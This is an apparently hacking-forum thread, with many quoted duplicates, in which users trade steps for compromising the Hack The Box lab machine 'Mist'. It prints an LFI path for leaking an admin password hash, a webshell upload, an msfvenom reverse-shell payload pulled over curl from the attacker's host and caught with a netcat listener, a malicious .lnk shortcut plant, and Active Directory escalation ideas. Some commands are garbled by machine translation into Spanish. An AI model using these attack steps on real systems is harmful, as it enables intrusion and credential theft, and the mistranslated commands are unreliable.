[uwuwhoreingismeuwu]

SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege

[FiatPandaGTRacingKit]

For brandon:
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk

foreach ($file in $sourceFiles) {
    $sourceFile = $file.FullName
    $destFile = Join-Path -Path $destination -ChildPath $file.Name
    if (Test-Path -Path $destFile) {
    $sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
    $dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
    write-host $sHash
    write-host $dHash
        if ($sHash -ne $dHash) {
        Invoke-Item $destFile
        start-sleep -seconds 5
        }
    }
}

Means you can upload a crafted .lnk file(to the directory in the code above) to trigger a shell and  to get the shell as brandon.

how did you do it if we don't have permissions to access the "C:\Users\Brandon.Keywarp\AppData\links"

[uwuwhoreingismeuwu]

For brandon:
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk

foreach ($file in $sourceFiles) {
    $sourceFile = $file.FullName
    $destFile = Join-Path -Path $destination -ChildPath $file.Name
    if (Test-Path -Path $destFile) {
    $sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
    $dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
    write-host $sHash
    write-host $dHash
        if ($sHash -ne $dHash) {
        Invoke-Item $destFile
        start-sleep -seconds 5
        }
    }
}

Means you can upload a crafted .lnk file(to the directory in the code above) to trigger a shell and  to get the shell as brandon.

how did you do it if we don't have permissions to access the "C:\Users\Brandon.Keywarp\AppData\links"

you dont need brandon

[xxxbfacc]

Ok time to move everyone along so we get some more eyes on this to find next steps...

Get shell as Brandon on ms01:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Save()
and wait a few min...

Brandon dirs on MS01 seem boring.
Nothing in winpeas either.
And he can only see SYSVOL on DC01 via smb.

Brandon can access certificate services (certify, certipy).
You can req a certificate for user authentication, and use it to get the ntlm pair for Brandon to PTT.
No vulnerable certs though according to the tools.

Brandon can also dump AD via ldap.

Bloodhound shows the members of Operatives group (op_ users) inherit membership to Remote Management Users, so can probably get a shell on DC01.

Sharon_Mullard has logged into MS01 in the past, her creds might be stored if we can root MS01.
the account op_Sharon_Mullard might share a password or hash with Sharon_Mullard and can probably pop a shell.
I'm thinking this is the path forward...

Anyone find anything else interesting?
I'm sure there is some clue were all missing...

[a44857437]

Ok time to move everyone along so we get some more eyes on this to find next steps...

Get shell as Brandon on ms01:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Save()
and wait a few min...

Brandon dirs on MS01 seem boring.
Nothing in winpeas either.
And he can only see SYSVOL on DC01 via smb.

Brandon can access certificate services (certify, certipy).
You can req a certificate for user authentication, and use it to get the ntlm pair for Brandon to PTT.
No vulnerable certs though according to the tools.

Brandon can also dump AD via ldap.

Bloodhound shows the members of Operatives group (op_ users) inherit membership to Remote Management Users, so can probably get a shell on DC01.

Sharon_Mullard has logged into MS01 in the past, her creds might be stored if we can root MS01.
the account op_Sharon_Mullard might share a password or hash with Sharon_Mullard and can probably pop a shell.
I'm thinking this is the path forward...

Anyone find anything else interesting?
I'm sure there is some clue were all missing...

I'm guessing that is a way forward, LSA process seems to be unprotected... 'just' get root on the MS01 box...

[defxsec]

Alguien me puede guiar como obtener una concha para Brandon

---

Para poder escalar al usuario Brandon:
Primero debemos crear un shell.exe con msfvenom:imsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.16 LPORT=5555 -a x64 -f exe -o shell.exe
luego subir el archivo shell.exe en la ruta c:\xampp\htdocs para eso crear un servidor http y con curl subirlo:
python3 -m http.servidor 8000
curl -o shell.exe http://10.10.16.16:8000/shell.exe

Ahora ejecutamos los siguientes comandos en un powershell si tiene un cmd cambiar a powershell:
$objShell = Nuevo-Objeto -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Aplicaciones comunes\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Guardar()

Esperar unos minutos mientras nos ponemos en escucha
Carolina del Norte-lvnp 5555

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: English Only Forum| https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.

[jonah]

we can mount ADMIN$, i dont know if it can help us, maybe this port forwading is just a rabbit hole

[cutearmadillo]

got foothold earlier, to do so it's not that hard :
1 - go to mist.htb/data/modules/albums/albums_getimage.php?image=admin_backup.php
2 - crack the password
3 - go to http://mist.htb/admin.php?action=installmodule and upload zip with an exe and a webshell, then run the exe through the webshell
now i found out there is some sort of av, i can't download or run winpeas.

How can I tell that `admin_backup.php` exists? Thank you for providing the solution ideas.

I have the same question, I get the:

<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146

But for this hint, I really don't know how I can know this file exist, and I downloaded the source of pluck 4.7.18 and this file dont exist. Help!, and thanks

There is a LFI for version 4.7 that lists this endpoint. Checking its source code on GitHub you can see where it looks for files (images) to be included (../../settings/modules/albums/) and directory listing is enabled there -> http://mist.htb/data/settings/modules/albums/

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[thing7]

Alguien me puede guiar como obtener una concha para Brandon

---

Para poder escalar al usuario Brandon:
Primero debemos crear un shell.exe con msfvenom:imsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.16 LPORT=5555 -a x64 -f exe -o shell.exe
luego subir el archivo shell.exe en la ruta c:\xampp\htdocs para eso crear un servidor http y con curl subirlo:
python3 -m http.servidor 8000
curl -o shell.exe http://10.10.16.16:8000/shell.exe

Ahora ejecutamos los siguientes comandos en un powershell si tiene un cmd cambiar a powershell:
$objShell = Nuevo-Objeto -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Aplicaciones comunes\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Guardar()

Esperar unos minutos mientras nos ponemos en escucha
Carolina del Norte-lvnp 5555

im confused, you upload the shell.exe with curl to the pluck machine?

---

Alguien me puede guiar como obtener una concha para Brandon

---

Para poder escalar al usuario Brandon:
Primero debemos crear un shell.exe con msfvenom:imsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.16 LPORT=5555 -a x64 -f exe -o shell.exe
luego subir el archivo shell.exe en la ruta c:\xampp\htdocs para eso crear un servidor http y con curl subirlo:
python3 -m http.servidor 8000
curl -o shell.exe http://10.10.16.16:8000/shell.exe

Ahora ejecutamos los siguientes comandos en un powershell si tiene un cmd cambiar a powershell:
$objShell = Nuevo-Objeto -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Aplicaciones comunes\Calculator.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\shell.exe"
$lnk.Guardar()

Esperar unos minutos mientras nos ponemos en escucha
Carolina del Norte-lvnp 5555

im confused, you upload the shell.exe with curl to the pluck machine?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[ophalim]

Got Brandon Shell but idk what to do next